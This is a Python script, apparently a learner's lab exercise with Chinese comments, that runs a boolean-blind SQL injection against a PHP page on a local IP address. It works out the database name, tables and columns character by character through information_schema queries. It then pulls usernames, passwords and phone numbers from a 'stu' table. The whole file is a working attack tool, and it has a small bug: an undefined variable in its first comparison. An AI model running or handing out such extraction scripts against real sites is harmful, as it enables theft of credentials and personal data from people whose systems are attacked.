布尔盲注需简化代码

import requests,time,string
# 判断注入点
paylode1="?id=1 and 1=2"
paylode2="?id=1 and 1=1"
url="http://192.168.28.133/boke/aupdata.php"

#获取正确值
res1=requests.get(f'{url}{paylode2}')
response1 = res1.text
# print(response1)
if len(response)==len(response1):
    print('不存在布尔漏洞')
else:
    print('存在布尔注入漏洞，判断数据库长度')
    a1=0
    for a in range(6):
        res2 = requests.get(f'{url}?id=1 and length(database())={a}-- -')
        response3 = res2.text
        if len(response3)==len(response1):
            a1=a
            print(f"数据库长度为{a},开始爆破库名和表名")
            break
    low = string.ascii_lowercase
    res4=''
    for a2 in range(a1+1):
        for a3 in low:
            res3 = requests.get(f"{url}?id=1 and (substr(database(),{a2},1))='{a3}' -- -")
            response4=res3.text
            if len(response4) == len(response1):
               res4+=a3
    print(f'数据库名为{res4}')
    # 判断表的数量
    a5=0
    for a4 in range(10):
        res5=requests.get(f"{url}?id=1 and (SELECT count(table_name) from information_schema.tables where table_schema='{res4}')={a4}-- -")
        response5 = res5.text
        # print(response5)
        if len(response5) == len(response1):
            a5=a4

    res8=[]
    # 取表名
    for a6 in range(a5):
        res7 = ''
        for a7 in range(1,10):
            for a8 in low:
                # print(a6,a7,a8)
                res6 = requests.get(f"{url}?id=1 and substr((SELECT table_name from information_schema.tables where table_schema='{res4}' LIMIT {a6},1),{a7},1)='{a8}'-- -")
                response6=res6.text
                if len(response6) == len(response1):
                    res7+=a8
        res8.append(res7)
    print(f'数据库{res4}有{res8}表')
    # 遍历表
    res13=[]
    for a9 in res8:
        dic={}
        # 取列数
        for a10 in range(9):
            res9=requests.get(f"{url}?id=1 and (SELECT count(column_name) FROM information_schema.columns where table_schema='{res4}' and table_name='{a9}')={a10}")
            response7 = res9.text
            if len(response7) == len(response1):
                # print(a10) 3,8,4,6,7
                res12=[]
                # 根据列数遍历,列数为a10
                for a11 in range(a10):
                    res10=''
                    # 根据每列列明长度遍历
                    for a12 in range(1,10):
                         # 判断每列的字符
                        for a13 in low:
                            res11 = requests.get(f"{url}?id=1 and substr((SELECT column_name FROM information_schema.columns where table_schema='{res4}' and table_name='{a9}' limit {a11},1),{a12},1)='{a13}'-- -")
                            response8=res11.text
                            if len(response8) == len(response1):
                                res10+=a13
                    res12.append(res10)
        dic[a9]=res12
        res13.append(dic)
    print(f'库表对应{res13}')
    # 取出行数用户表行数
    a15=0
    for a14 in range(1,3):
        res14=requests.get(f"{url}?id=1 and (select count(*) from stu) ={a14}")
        response9 = res14.text
        if len(response9) == len(response1):
            a15=a14
            break
    #遍历用户名密码手机号
    loww='abcdefghijklmnopqrstuvwxyz,1234567890'
    res17=[]
    for a16 in range(a15):
        res16 = ''
        for a17 in range(1,25):
            for a18 in loww:
                res15 = requests.get(f"{url}?id=1 and substr((select concat_ws(',',sname,password,phone) from stu limit {a16},1),{a17},1) ='{a18}'")
                response10=res15.text
                if len(response10) == len(response1):
                    res16+=a18
        res17.append(res16)
    print(f'用户名，密码，电话为{res17}')